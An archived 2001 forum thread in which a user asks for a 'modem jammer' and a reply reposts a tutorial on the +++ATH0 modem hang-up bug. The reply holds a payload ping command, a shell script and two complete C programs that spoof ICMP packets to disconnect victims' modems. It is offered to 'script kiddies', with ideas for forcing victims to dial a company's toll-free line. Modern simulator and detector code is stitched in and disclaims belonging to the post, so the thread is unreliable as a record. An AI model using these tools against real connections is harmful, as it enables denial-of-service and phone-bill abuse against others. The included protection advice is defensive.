-
December 12th, 2001, 11:39 AM
#1
Junior Member
modem jammer
Does anybody know a good modem jammer program?
And if anybody knows what a modem jammer exactly does, tell it to me too.
Thanks
-
December 12th, 2001, 08:41 PM
#2
Banned
I'm not sure what you mean by modem jammer.
There is no way to stop a phone trace from a modem.
There are some programs out there that can make older unprotected modems hang up. They do this by sending the hang-up AT command in a ping. Fortunately that sort of tech is obsolete now; most new modems won't accept AT commands over TCP/IP anymore.
-
December 12th, 2001, 08:59 PM
#3
Wasn't that the +++ ATH0 bug?
Allen: If you mean to control someone's modem over the internet, I'm sorry, it's not really possible unless you have some sort of remote control on their system already. Are you talking about a direct modem-to-modem connection? Could you give more information?
If you mean your *own* modem, I suggest AirGap™, the 100% secure solution, putting a large amount of air between your phone/lan cord and your modem/NIC card. It's free too! And almost 100% secure against remote attacks.
[HvC]Terr: L33T Technical Proficiency
-
December 12th, 2001, 09:14 PM
#4
oddvector is right, the modemjammer is obsolete.
-
December 13th, 2001, 12:30 AM
#5
Ankit Fadia wrote this ages ago. It's probably outdated now with all the winmodems out now... anyway, here:
A little more than a year ago, I was really addicted to IRC’ing and chatting using IRC clients and Chatting software. There was a time when I used to connect to the Internet just to IRC. This addiction fortunately did not last long and I soon learnt how to get myself to stay away from chatting etc, however during this time, I had some very interesting experiences and even learnt a lot.
In this guide, I will explain some of this ‘pretty interesting’ stuff, which besides being interesting will also surely teach you one or two new things. This HT manual will answer a lot of your questions, some of them being: Controlling Modems Remotely. Sending Modems AT Commands remotely. How do I disconnect a person from the Internet, if I know his IP? How can I disconnect myself from the Internet? How do I control Modems Manually? Also, how to protect your Modem from these ATH attacks, and much much more.
Before I move on to the interesting stuff, I would first like to explain what exactly makes controlling modems remotely possible, or in other words, what is the core or what is the loophole (well, not exactly a loophole), which makes all modems connected to the Internet vulnerable.
To understand the core, we need to know how the data packets travel through the Internet or through a Local Area Network or LAN. Let us assume, that your IP Address is xx.xx.xx.xx and the server you are connecting to has the IP: yy.yy.yy.yy Now, say you run a C program which creates a single data packet and sends it to yy.yy.yy.yy, then the packet, would take the following path to reach its destination.
C Program at Source -------Router --------Daemon at Destination’s Port
(xx.xx.xx.xx) (yy.yy.yy.yy)
However, the above is a simple description of the entire process, if we describe the process, more deeply, then it would be:
C Program at source -----Modem of Source --- Router ----- Modem of Destination ------ Destination Daemon
So, basically each packet goes through the modem at both the source and destination. Thus the thing to remember here is that all data go through the modems, which could also be modem commands. Read on for more details.
Now, you see, a system talks to or controls a modem by issuing modem commands, which are generally called AT commands. This was a pretty vague and incomplete description of what modem commands are. To fully understand them, read on.
--------------------------------------------------------------------------------
Hayes, a long time ago, set down a standard for modem commands, which started to be followed by a lot of Modem Manufacturers and modems following this standard were called ‘Hayes Compatible’. This complete set of Modem Commands, which follows the Hayes Standard, is called the AT Command set.
Here, AT stands for Attention. It basically tends to say to the Modem, ‘OK, Mr Modem, you better pay attention as I have some commands for you to execute’. The ‘AT’ precedes all Modem commands with a few exceptions, which we will discuss later.
**********************
HACKING TRUTH: A very simple and basic example of an AT command, would be, the one which is issued when you dial into your ISP. You, see when you click on the ‘Connect’ Button, the DUN software sends the following command to your modem:
ATDT or ATDP command followed by the number you want to dial and enter.
Now, let us analyze various parts of the above command. The ‘AT’ tells the modem to pay attention. The second part tells the modem, what kind of dialing system to use. For Example, DT tells it to use dial by tone, while DP tells it to use pulse dial. And the last part is the number you want to dial.
NOTE: To issue commands to your modem, you need to be in Command mode of your communication package.
*********************
Your modem accepts commands only when it is in the command mode. A modem is always either in the command mode or the on-line mode. When you boot up, your modem is by default in command mode. So, when your modem is in command mode, all AT commands are considered to be commands, while in online mode, all commands are treated as data.
Now, we come to an interesting part. The above paragraph tells us that when we connect to the Internet, our modem is in the online mode and thus cannot accept any commands. So, this means that even if you know the IP Address of a person and send them a modem command string, then the modem will only treat it as normal data and will not react to it, as it is in online mode. So, for the modem to start accepting and start reacting to AT commands, it has to be switched to the command mode. This is where the escape sequence comes in.
When the modem is in the online mode, then it can be brought to the command mode by sending it the escape characters i.e. +++. Passing the escape characters will switch the modem to the command mode and it will start reacting to AT commands. On giving the escape character, the actual AT command need not have the string ‘AT’ and it need not end with ‘enter’.
************************
HACKING TRUTH: The modem can be returned to the on-line state after the escape sequence has been issued. To return the modem to the on-line state, you have to give the ATO command.
************************
This means, that if you know the IP Address of someone, then if you send the +++ string to it followed by the AT Modem command, then you could practically control it, remotely. You could disconnect the modem, change the Dial type, force it to dial a particular number etc etc.
--------------------------------------------------------------------------------
Let me take an example to make it clearer. Now, H0 is the AT command, which instructs the modem to disconnect or hang-up. Now, normally, if you want to disconnect your own modem or a local modem, then you would issue the following command:
+++ATH0
This basically switches your modem from the online mode to the command mode, and then sends it the H0 command, which is the disconnect command and thus disconnects the modem.
This same command, if sent to a remote system, will disconnect it from the network!!!
Now, before I move on to how to implement this attack through a C program, let us see, how to do the same through ping.
The following command, works on most systems, but from the arguments, I believe it will not work on Win 9x machines.
ping -c 5 -p 2b2b2b415453323d32353526574f310d ip
For explanation of the above ping command, I suggest you read the man pages of your *nix box: Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
$>man ping
Also, the following is a shell script, which does the same for you:
#!/bin/sh
ping -p 2b2b2b415448300d $*
NOTE: This exploit or the ATH0 attacks do not work on all modems. It is not true that all old modems are vulnerable or all new modems are safe, it basically depends on brand to brand. For more details about how to protect your modem from such attacks, read the section titled ‘Protection’ in this manual.
--------------------------------------------------------------------------------
More on modems...
There is a C program, from PacketStorm, which spoofs ICMP packets and performs the same attack.
The way the exploit works is it hides escape/control sequences in an ICMP echo_request packet (it contains the string +++ATH0). The +++ sends the modem into escape mode (and if the guard time on the modem is set ridiculously low) it will go into command mode and you can issue it an ATH0 to hang up. It works on the reply, because the target receives the echo_request packet, then duplicates the packet with a new timestamp and checksum and swapped dest/source hosts and returns it to the sender; when it returns it, the string is sent to the modem, thus hanging it up. There are a few conditions that must be met for it to work (if you don't want to be vulnerable to this, fix these!)
1) target computer must not filter ICMP echo_request and must know how to reply to one if it gets one
2) target computer must be using a modem (you can't hang up DS3s, although I suppose you could hang up telco return connections... if you can find one)
3) target computer must have a vulnerable modem (i.e. guard time is set ridiculously low)
4) you have to be able to send spoofed packets (or..if you can't i guess you can use your own address, but then the target knows where it came from)
In my experimenting, I have also devised various fun ways to use this program other than just nuking your buddy off IRC. In theory, it is possible to modify the program to do fun stuff like make the target call some number after it hangs up (i.e. +++ATH0,,,DT5551212 should make the modem hang up, pause for 6 seconds, then call 5551212). This is fun for obvious reasons. The next variation I came up with is a smurf-like implementation in which you could make a script to DoS a class C subnet with the number of your least favorite company; since most companies have 800 numbers, not only does this cause chaos to the phone bank, but it also costs ~$.30 per call... but I don't condone any of those ideas of course, this is just for experimental/educational purposes only. If you fix your modems, none of this is possible, so get off your ass and fix it.
--------------------------------------------------------------------------------
More on modems...
script kiddiez: here is your code... Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE
/*
 * gin.c
 * jpester@engr.csulb.edu
 */
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#define VERSION "1.2-05.05" //fixed old compiler compatibility problems
#define FRIEND "foo"
void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );
int main( int argc, char **argv )
{
struct hostent *sourceinfo, *destinfo;
struct sockaddr_in sin, din;
int sockfd, numpackets, i;
char *target, *source;
banner();
if( argc < 4 ) usage( get_progname( argv[0] ) );
source = argv[1];
target = argv[2];
numpackets = ( atoi( argv[3] ) );
signal( SIGINT, done );
if( ( sourceinfo = gethostbyname( source ) ) == NULL )
{
printf( "cannot resolve source host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr,
sourceinfo->h_length );
sin.sin_family = AF_INET;
if( ( destinfo = gethostbyname( target ) ) == NULL )
{
printf( "cannot resolve destination host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr,
destinfo->h_length );
din.sin_family = AF_INET;
if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
{
printf( "Cannot get raw socket, you must be root!\n" );
exit( -1 );
}
printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
printf( "Number\t\t\t: %d\n", numpackets );
printf( "Have some gin sucka" );
for( i = 0; i < numpackets; i++ )
gin( sockfd, sin, din );
printf( "\n\nsent %d packet%s...done\n", numpackets, ( numpackets > 1 ) ? "s" : "" );
return 0;
}
void usage( char *name )
{
printf( "usage: %s <source host> <dest host> <num packets>\n[ http://www.rootshell.com/ ] \n\n", name );
exit( 0 );
}
void banner( void )
{
printf( "\ngin [ v%s ] /\\ by amputee\n", VERSION );
printf( "compiled for: %s\n\n", FRIEND );
}
char *get_progname( char *fullname )
{
char *retval = strrchr( fullname, '/' );
return retval ? ++retval : fullname;
}
void done( int foo )
{
puts( "Exiting...\n" );
exit( 1 );
}
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din )
{
	/* four CR-terminated copies of escape + hang-up; the last four bytes
	   are dropped below ( len - 4 ), as in the original */
	char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
	char *packet;
	int total;
	struct iphdr *ip;
	struct icmphdr *icmp;
	size_t iphlen = sizeof( struct iphdr );
	size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct timeval );
	int len = strlen( ginstring );
	/* IP header + ICMP header + timestamp + payload, sized once so that
	   sendto() below cannot read past the end of the buffer */
	total = ( iphlen + icplen + timlen + ( len - 4 ) );
	packet = ( char * )malloc( total );
	memset( packet, 0, total );	/* id, frag_off and checksums start at zero */
	ip = ( struct iphdr * )packet;
	icmp = ( struct icmphdr * )( packet + iphlen );
	( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen )],
		( struct timezone * )NULL );
	memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 ) );
	ip->tot_len = htons( total );
	ip->version = 4;
	ip->ihl = 5;
	ip->tos = 0;
	ip->ttl = 255;
	ip->protocol = IPPROTO_ICMP;
	ip->saddr = sin.sin_addr.s_addr;
	ip->daddr = din.sin_addr.s_addr;
	ip->check = in_chksum( ( u_short * )ip, iphlen );
	icmp->type = ICMP_ECHO;
	icmp->code = 0;
	icmp->checksum = 0;	/* field must be zero while the checksum is computed */
	icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + timlen + ( len - 4 ) ) );
	sendto( port, packet, total, 0,
		( struct sockaddr * )&din, sizeof( struct sockaddr ) );
	free( packet );
}
// stolen from smurf
unsigned short in_chksum( u_short *ipbuf, int iplen )
{
register int nleft = iplen;
register int sum = 0;
u_short answer = 0;
while( nleft > 1 )
{
sum += *ipbuf++;
nleft -= 2;
}
if( nleft == 1 )
{
*( u_char * )( &answer ) = *( u_char * )ipbuf;
sum += answer;
}
sum = ( sum >> 16 ) + ( sum & 0xffff );	/* fold the high 16 bits into the low 16 */
sum += ( sum >> 16 );
answer = ~sum;
return( answer );
}
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE
More on modems...
Also note: some machines seg fault when they run this, and setting the environment variable MALLOC_CHECK_ to 1 seems to solve this. And..this code will probably come out all offset and break when you try to compile it...so just fix it, it compiles fine (i use g++ -O3 -o gin gin.c).
__________________________________________
Yet, another program, (a better one) from their Archive: Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
/* Hi, this is basically a small C program to quickly use the +++ATH0 modem bug on a given target. This thing is handy because you do not have to go through the trouble of typing the ping string, and it spoofs, which is also quite handy.
Anyway, use this to disconnect most modems on ANY OS on the internet by sending an ICMP_ECHO_REQUEST with the contents of +++ATH0. The modem gets it and (since it's an ICMP ECHO) sends the same packet back and resets. It can be patched by setting the modem register S2 to such a value that turns the command mode of the modem off (255 will do). The modem will NOT execute the commands in the packets anymore and will function stably.
NOTE: Before you actually USE this program, turn your OWN command mode off, or else your modem will RESET upon trying to send the packets away. Put the statement S2=255 somewhere in your modem CALL STRING. It should look something like this: OK ATB0&C1&D2S2=255DT<Phone No.>
At least, it does so on my modem. Note that some modems will get into trouble with the command mode turned off. If this is the case, tough, you CANNOT use this program AND you ARE VULNERABLE to this attack.
This should be it, all you script kiddies, have fun. Do with this code whatever you want, it's way too simple and lame.
Have fun,
Scrippie
If you think this program is truly cool (which is not true) mail me at:
ronald.huizer@wxs.nl
The way to patch a modem has been added thanks to Ardrian Gonzales...
Some modems may disconnect when trying to use the patch.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>	/* inet_addr(), INADDR_NONE */
#define BUFFER 80
#define RESET "+++ATH0\x0d"
#define PATCH "+++ATH0H1TD112\x0d"
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr);
unsigned short in_cksum(u_short *addr, int len);
int killmodem(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, unsigned int type)
{
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
char *blah;
int rc;
int c;
int b=0;
switch(type)
{ case (0): { blah = RESET; break; }
case (1): { blah = PATCH; break; }
default: blah = RESET;
}
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + BUFFER);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
for(c=0;c<(sizeof(struct iphdr)+ sizeof(struct icmphdr) + BUFFER);c++)
{
if(b==strlen(blah)) b=0;
packet[c]=blah[b];
b++;
}
/* This is the IP header of our packet. */
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->id = htons(43210);
ip->frag_off = htons(0);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + BUFFER);
ip->ttl = 25;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = 0;
icmp->checksum = in_cksum((u_short *)icmp,sizeof(struct icmphdr) + BUFFER);
if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + BUFFER, 0,
           (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1)
{
	free(packet);	/* do not leak the buffer on a failed send */
	return(-1);
}
free(packet);
return(0);
}
int main(int argc, char **argv)
{
struct sockaddr_in dest_addr;
unsigned int i, type;
int sock;	/* must be signed: socket() reports failure as -1 */
unsigned long src_addr;
if(geteuid()!=0)
{
fprintf(stderr, "You must be ROOT in order to run this!\n");
return(-1);
}
printf("Modem Killer - Version 1.0b - Spoofable\n");
printf("By Scrippie\n");
if ((argc != 5)) {
printf("Use the following format:\n");
printf("%s <Spoof IP> <Target IP> <Number> <Type>\n", argv[0]);
printf("Where type means the type of the modem crash.\n");
printf("---------------------------------------------\n");
printf("Type 0: Makes the modem hangup\n");
printf("Type 1: Patches a modem against attacks\n");
printf("---------------------------------------------\n");
printf("Greetz, Scrippie\n");
return(-1);
}
switch(atoi(argv[4]))
{
case (0): { type = 0; break; }
case (1): { type = 1; break; }
default:{ printf("WRONG type you idiot!\n"); return(-1); }
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf(stderr,"No RAW sockets available...\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("Now sending the modem kill...\n");
for (i = 0;i < atoi(argv[3]);i++)
{
if (killmodem(sock, src_addr, &dest_addr, type) == -1)
{
fprintf(stderr,"Cannot send packet...\n");
return(-1);
}
usleep(10000);
}
return(0);
}
/********************************************\
*** Of course, no one has EVER seen this piece of networking code before... ***
\********************************************/
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr)
{
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == INADDR_NONE) {	/* not a dotted quad: try DNS */
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
--------------------------------------------------------------------------------
More on modems...
Protection
Well, protection from these attacks is quite simple. But, I do suggest that before you read this section, you should try the above attacks on yourself, and see whether you are vulnerable or not. Anyway, to protect your modem from ATH0 attacks, or in other words to prevent it from switching from online mode to command line mode, all you have to do is: Set your init string to: S2=255.
*******************
HACKING TRUTH: You can change the initialization settings of your modem, in two different ways-:
1.Through the Windows Registry (The Kewl, but long Way)
Go to, the following registry key and change the Settings to the Value you want it to be.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Modem\0000\Init
2.Through the Modems option in the Control Panel. (The shorter, but not so kewl method.)
Simply Click on: Start > Settings > Control Panel. Then right click on Modems Choose Properties > Configure > Connection > Advanced.
Then enter the string in the specified area.
*******************
This will make your modem safe from this kind of attack, as it will treat AT commands as data, due to the fact that it will remain in online mode and not switch to command mode. However, some very obsolete modems tend to remain unaffected by the above protection method and thus remain vulnerable. Also, I have heard that there are some Anti-Nuke protection programs which provide your system protection from ATH0 attacks. Try: www.anticode.com
And for complete information and documentation on Hayes Compatible AT commands, visit the following sites: www.modem.com and
www.modemhelp.com
More on modems...
Modem Tips and Tricks
Remember the batch file Virus, that I showed how to code in one of my previous tutorials? Well, keeping in mind, the power of DOS exhibited in that manual, here is yet another trick which shows you how to dial a connection or connect to the Internet by a simple single line DOS command. The syntax of the command is: (Case Sensitive)
rundll rnaui.dll,RnaDial ConnectionName
For Example,
If the connection name, which I want to dial is: MTNL, then the command which will pop up the Connection Dial Box would be:
C:\windows> rundll rnaui.dll,RnaDial MTNL
If you want the ‘Make New Connection’ Dialog box to pop up, then use the following command:
C:\windows>rundll rnaui.dll,RnaWizard /1
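The guard-time and S2=255 points made in the post above, as an added example that is not part of the original post and not any modem's firmware: a small model of a Hayes-style escape detector. The register semantics are assumed for illustration (S2 holds the escape character and any value above 127 disables the escape; S12 holds the guard time in 1/50-second units, with S12=0 standing in for a modem that needs no guard time at all, the "ridiculously low guard time" case). The model ignores the PPP and IP header bytes that really arrive in front of an echoed payload, which only makes the attack look easier than it is.

```c
#include <ctype.h>
#include <stdint.h>
#include <string.h>

enum mode { ONLINE, COMMAND };

struct modem {
    uint8_t   s2;        /* escape character ('+' = 43); above 127 disables the escape (assumed) */
    uint8_t   s12;       /* guard time in 1/50 s (50 = one second); 0 models "no guard time" (assumed) */
    enum mode mode;
    int       escapes;   /* consecutive escape characters seen while ONLINE */
    char      line[32];  /* command line collected while in COMMAND mode */
    size_t    line_len;
    int       hung_up;   /* set once ATH / ATH0 is executed */
};

void modem_init(struct modem *m, uint8_t s2, uint8_t s12)
{
    memset(m, 0, sizeof *m);
    m->s2 = s2; m->s12 = s12; m->mode = ONLINE;
}

static unsigned guard_ms(const struct modem *m) { return m->s12 * 20u; }

/* Execute the collected line: a tiny subset of the AT set, enough for the post. */
static void modem_execute(struct modem *m)
{
    char *p = m->line;
    m->line[m->line_len] = '\0';
    for (char *q = p; *q; q++)
        *q = (char)toupper((unsigned char)*q);
    if (strncmp(p, "AT", 2) != 0)
        return;                          /* not a command line: ignored */
    for (p += 2; *p; p++) {
        if (*p == 'H' && p[1] != '1')    /* ATH, ATH0: hang up */
            m->hung_up = 1;
        else if (*p == 'O') {            /* ATO: back online, escape state cleared */
            m->mode = ONLINE;
            m->escapes = 0;
        }
    }
}

/* One byte from the line, arriving after gap_ms of silence. */
void modem_rx(struct modem *m, uint8_t byte, unsigned gap_ms)
{
    if (m->mode == COMMAND) {
        if (byte == '\r') {
            modem_execute(m);
            m->line_len = 0;
        } else if (m->line_len < sizeof m->line - 1) {
            m->line[m->line_len++] = (char)byte;
        }
        return;
    }
    if (m->s2 > 127)                     /* S2=255: no escape character exists, everything is data */
        return;
    if (byte == m->s2) {
        if (m->escapes == 0)             /* first '+' only counts after a full guard time of silence */
            m->escapes = gap_ms >= guard_ms(m) ? 1 : 0;
        else if (m->escapes < 3)
            m->escapes++;
        else
            m->escapes = 0;              /* "++++" is data */
        return;
    }
    if (m->escapes == 3 && guard_ms(m) == 0) {
        m->mode = COMMAND;               /* no guard time: "+++" glued to "AT..." still escapes */
        m->line_len = 0;
        modem_rx(m, byte, 0);
        return;
    }
    m->escapes = 0;                      /* data right behind "+++" cancels the escape */
}

/* Silence on the line: "+++" followed by a full guard time drops to COMMAND mode. */
void modem_idle(struct modem *m, unsigned ms)
{
    if (m->mode == ONLINE && m->escapes == 3 && ms >= guard_ms(m)) {
        m->mode = COMMAND;
        m->line_len = 0;
    }
}

/* Deliver a string back to back, with silence before the first byte and after the last. */
void modem_burst(struct modem *m, const char *data, unsigned before_ms, unsigned after_ms)
{
    for (size_t i = 0; data[i]; i++)
        modem_rx(m, (uint8_t)data[i], i == 0 ? before_ms : 0);
    modem_idle(m, after_ms);
}

/* Does a modem configured with (s2, s12) hang up when "+++ATH0\r" arrives inside
 * one packet (the shape of an echoed ping payload) with the given silence around it? */
int hangs_up(uint8_t s2, uint8_t s12, unsigned before_ms, unsigned after_ms)
{
    struct modem m;
    modem_init(&m, s2, s12);
    modem_burst(&m, "+++ATH0\r", before_ms, after_ms);
    return m.hung_up;
}
```

With a one-second guard time the escape never fires, because "ATH0" follows the "+++" with no pause; only the no-guard-time modem (S12=0 here) drops into command mode, and S2=255 keeps even that modem online. Filtering echo requests at the host, condition 1 in the PacketStorm text, removes the delivery path altogether.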
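A network-side check for the echo trick, added here as an example and not code from the post or from PacketStorm: it parses a raw IPv4 packet, verifies the IP and ICMP checksums with the carry fold written out, and reports an AT command hiding behind "+++" in an echo request or reply. Sample packets are constructed in memory by build_echo(); the addresses 10.0.0.1 and 10.0.0.2 and the 56-byte payloads are made up for the demo and nothing is sent.

```c
#include <ctype.h>
#include <stdint.h>
#include <string.h>

/* RFC 1071 Internet checksum over big-endian 16-bit words.  Verifying a
 * header or ICMP message that already carries its checksum yields 0. */
uint16_t inet_cksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; buf += 2, len -= 2)
        sum += (uint32_t)((buf[0] << 8) | buf[1]);
    if (len == 1)
        sum += (uint32_t)(buf[0] << 8);       /* odd trailing byte, zero padded */
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);   /* fold carries back into 16 bits */
    return (uint16_t)~sum;
}

/* Assemble IPv4 header + ICMP echo (type 8 request / 0 reply) + payload in memory.
 * Returns the packet length, or 0 if it does not fit in out[]. */
size_t build_echo(uint8_t *out, size_t cap, uint32_t src, uint32_t dst,
                  uint8_t type, const uint8_t *payload, size_t plen)
{
    size_t total = 20 + 8 + plen;
    if (total > cap)
        return 0;
    memset(out, 0, total);
    out[0] = 0x45;                            /* version 4, IHL 5 (20 bytes) */
    out[2] = (uint8_t)(total >> 8);
    out[3] = (uint8_t)total;
    out[8] = 64;                              /* TTL */
    out[9] = 1;                               /* protocol: ICMP */
    for (int i = 0; i < 4; i++) {
        out[12 + i] = (uint8_t)(src >> (24 - 8 * i));
        out[16 + i] = (uint8_t)(dst >> (24 - 8 * i));
    }
    uint16_t c = inet_cksum(out, 20);
    out[10] = (uint8_t)(c >> 8);
    out[11] = (uint8_t)c;
    uint8_t *icmp = out + 20;
    icmp[0] = type;                           /* code, id and sequence stay 0 */
    memcpy(icmp + 8, payload, plen);
    c = inet_cksum(icmp, 8 + plen);
    icmp[2] = (uint8_t)(c >> 8);
    icmp[3] = (uint8_t)c;
    return total;
}

/* Returns 1 and copies the AT command line (without the "+++", up to CR) into cmd
 * when a well-formed ICMP echo request/reply carries "+++AT..." in its payload;
 * 0 for a clean echo; -1 for anything malformed or not an echo at all. */
int scan_echo_for_at_escape(const uint8_t *pkt, size_t len, char *cmd, size_t cap)
{
    if (len < 20 || (pkt[0] >> 4) != 4)
        return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    size_t tot = (size_t)((pkt[2] << 8) | pkt[3]);
    if (ihl < 20 || tot > len || tot < ihl + 8 || pkt[9] != 1)
        return -1;                            /* bad lengths or not ICMP */
    if (inet_cksum(pkt, ihl) != 0)
        return -1;                            /* IP header checksum failed */
    const uint8_t *icmp = pkt + ihl;
    size_t ilen = tot - ihl;
    if ((icmp[0] != 8 && icmp[0] != 0) || inet_cksum(icmp, ilen) != 0)
        return -1;                            /* not echo, or ICMP checksum failed */
    const uint8_t *data = icmp + 8;
    size_t dlen = ilen - 8;
    for (size_t i = 0; i + 5 <= dlen; i++) {
        if (memcmp(data + i, "+++", 3) != 0)
            continue;
        if (toupper(data[i + 3]) != 'A' || toupper(data[i + 4]) != 'T')
            continue;                         /* "+++" with no AT command behind it */
        size_t n = 0;
        for (size_t j = i + 3; j < dlen && data[j] != '\r' && n + 1 < cap; j++)
            cmd[n++] = (char)data[j];
        cmd[n] = '\0';
        return 1;
    }
    if (cap)
        cmd[0] = '\0';
    return 0;
}

/* Constructed samples (10.0.0.1 <-> 10.0.0.2, 56-byte payloads like ping's). */
const char *demo_ping_pattern(void)   /* ping -p 2b2b2b415448300d: 8-byte pattern repeated */
{
    static char cmd[32];
    static const char pattern[] = "+++ATH0\r";
    uint8_t payload[56], pkt[128];
    for (size_t i = 0; i < sizeof payload; i++)
        payload[i] = (uint8_t)pattern[i % 8];
    size_t n = build_echo(pkt, sizeof pkt, 0x0a000001u, 0x0a000002u, 8, payload, sizeof payload);
    return scan_echo_for_at_escape(pkt, n, cmd, sizeof cmd) == 1 ? cmd : NULL;
}

int demo_ordinary_ping(void)          /* default-style payload: zeroed timestamp, then 0x10, 0x11, ... */
{
    uint8_t payload[56], pkt[128];
    char cmd[32];
    for (size_t i = 0; i < sizeof payload; i++)
        payload[i] = i < 8 ? 0 : (uint8_t)(0x08 + i);
    size_t n = build_echo(pkt, sizeof pkt, 0x0a000002u, 0x0a000001u, 0, payload, sizeof payload);
    return scan_echo_for_at_escape(pkt, n, cmd, sizeof cmd);
}

int demo_corrupted(void)              /* one flipped payload byte: the ICMP checksum no longer verifies */
{
    uint8_t pkt[128];
    char cmd[32];
    size_t n = build_echo(pkt, sizeof pkt, 0x0a000001u, 0x0a000002u, 8, (const uint8_t *)"+++ATH0\r", 8);
    pkt[n - 1] ^= 0xff;
    return scan_echo_for_at_escape(pkt, n, cmd, sizeof cmd);
}
```

The scan deliberately accepts both echo requests and replies: the request is what an upstream filter sees, the reply is what actually reaches the victim's modem, and the payload is identical in both.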
-
December 13th, 2001, 12:32 AM
#6
Ankit Fadia wrote this ages ago..Its probally outdated now with all the winmodems out now...anyway here:
A little more than a year ago, I was really addicted to IRC’ing and chatting using IRC clients and Chatting software. There was a time when I used to connect to the Internet just to IRC. This addiction fortunately did not last long and I soon learnt how to get myself to stay away from chatting etc, however during this time, I had some very interesting experiences and even learnt a lot.
In this guide, I will explain some of these ‘pretty interesting’ stuff, which besides being interesting will also surely teach you one or two new things. This HT manual will answer a lot of your questions, some of them being; Controlling Modems Remotely. Sending Modems AT Commands remotely. How do I disconnect a person from the Internet, if I know his IP? How can I disconnect myself from the Internet? How do I control Modems Manually? Also, how to protect your Modem from these ATH attacks, and much much more.
Before I move on to the interesting stuff, I would first like to explain what exactly makes controlling modems remotely possible or in other words, what is the core or what is the loophole (well, no exactly a loophole.),which makes all modems connected to the Internet Vulnerable.
To understand the core, we need to know how the data packets travel through the Internet or through a Local Area Network or LAN. Let us assume, that your IP Address is xx.xx.xx.xx and the server you are connecting to has the IP: yy.yy.yy.yy Now, say you run a C program which creates a single data packet and sends it to yy.yy.yy.yy, then the packet, would take the following path to reach its destination.
C Program at Source -------Router --------Daemon at Destination’s Port
(xx.xx.xx.xx) (yy.yy.yy.yy)
However, the above is a simple description of the entire process, if we describe the process, more deeply, then it would be:
C Program at source -----Modem of Source --- Router ----- Modem of Destination ------ Destination Daemon
So, basically each packet goes through the modem at both the source and destination. Thus the thing to remember here is that all data go through the modems, which could also be modem commands. Read on for more details.
Now, you see, a system talks to or controls a modem by issuing Modem command, which are generally called AT commands. This was a pretty vague and incomplete description of what modem commands are. To fully understand them, read on.
More--->>
--------------------------------------------------------------------------------
